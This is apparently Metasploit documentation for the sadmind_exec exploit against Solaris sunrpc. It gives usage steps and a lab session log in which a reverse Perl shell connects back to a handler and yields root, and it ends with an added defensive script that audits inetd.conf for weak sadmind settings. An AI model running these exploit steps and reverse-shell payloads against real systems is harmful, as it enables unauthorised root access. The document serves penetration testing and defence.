documentation/modules/exploit/solaris/sunrpc/sadmind_exec.md
This exploit targets a weakness in the default security settings of the Sun Solstice AdminSuite distributed system administration daemon (sadmind) RPC application. This server is installed and enabled by default on most versions of the Solaris operating system.
Vulnerable systems include Solaris 2.7, 8, and 9.
This module has been successfully tested on:
msfconsole
use exploit/solaris/sunrpc/sadmind_exec
set rhosts [rhost]
exploit
Expected result: a session as the root user.
Remote hostname. The hostname will be detected automatically by default; however, using the automatically detected hostname will fail if the system hostname was changed after the sadmind service was started.
GID to emulate (default: 0)
UID to emulate (default: 0)
msf > use exploit/solaris/sunrpc/sadmind_exec
msf exploit(solaris/sunrpc/sadmind_exec) > set rhosts 192.168.200.148
rhosts => 192.168.200.148
msf exploit(solaris/sunrpc/sadmind_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(solaris/sunrpc/sadmind_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.148:111 - Attempting to determine hostname
[*] 192.168.200.148:111 - Found hostname: unknown
[*] 192.168.200.148:111 - Sending payload (234 bytes)
[+] 192.168.200.148:111 - Exploit did not give us an error, this is good.
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.148:32810) at 2025-04-21 01:38:08 -0400
id
uid=0(root) gid=0(root)
uname -a
SunOS unknown 5.8 Generic_108529-01 i86pc i386 i86pc
cat /etc/release
Solaris 8 6/00 s28x_u1wos_08 INTEL
Copyright 2000 Sun Microsystems, Inc. All Rights Reserved.
Assembled 28 April 2000
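A defender-side check for the default configuration described above, as an added example that is not part of the original module documentation: it scans an inetd.conf-style file for an active sadmind entry and reports the configured security level. The RPC program number 100232, the `-S` flag semantics (0 = NONE, 1 = SYS and the default, 2 = DES), the function name `audit_sadmind` and the sample entries are assumptions not taken from this page.

```shell
#!/bin/sh
# Added example, not Metasploit or Sun code. Assumptions: sadmind is RPC
# program 100232 and is started from inetd.conf; its -S flag sets the
# security level (0 = NONE, 1 = SYS, the default; 2 = DES).

# audit_sadmind FILE
# Prints "WEAK <level>" or "OK <level>" for each active sadmind entry,
# or "ABSENT" when the file has no active entry.
audit_sadmind() {
    awk '
        /^[ \t]*#/ || NF == 0 { next }           # comments and blank lines
        $1 ~ /^100232\// || $6 ~ /\/sadmind$/ {
            level = 1                            # no -S argument: default level
            for (i = 7; i <= NF; i++) {
                if ($i == "-S" && i < NF) level = $(i + 1)
                else if ($i ~ /^-S[0-9]+$/) level = substr($i, 3)
            }
            # Levels 0 and 1 accept caller-asserted identity; 2 requires DES auth.
            verdict = (level + 0 >= 2) ? "OK" : "WEAK"
            print verdict, level
            found = 1
        }
        END { if (!found) print "ABSENT" }
    ' "$1"
}

# Constructed sample files: stock entry, hardened entry, disabled entry.
sample_dir=$(mktemp -d)
echo '100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind' > "$sample_dir/default.conf"
echo '100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2' > "$sample_dir/hardened.conf"
echo '#100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind' > "$sample_dir/disabled.conf"

for name in default hardened disabled; do
    printf '%s: %s\n' "$name" "$(audit_sadmind "$sample_dir/$name.conf")"
done
rm -rf "$sample_dir"
```

On a Solaris host, pass `/etc/inetd.conf`; a `WEAK` result means the service should be disabled or restricted.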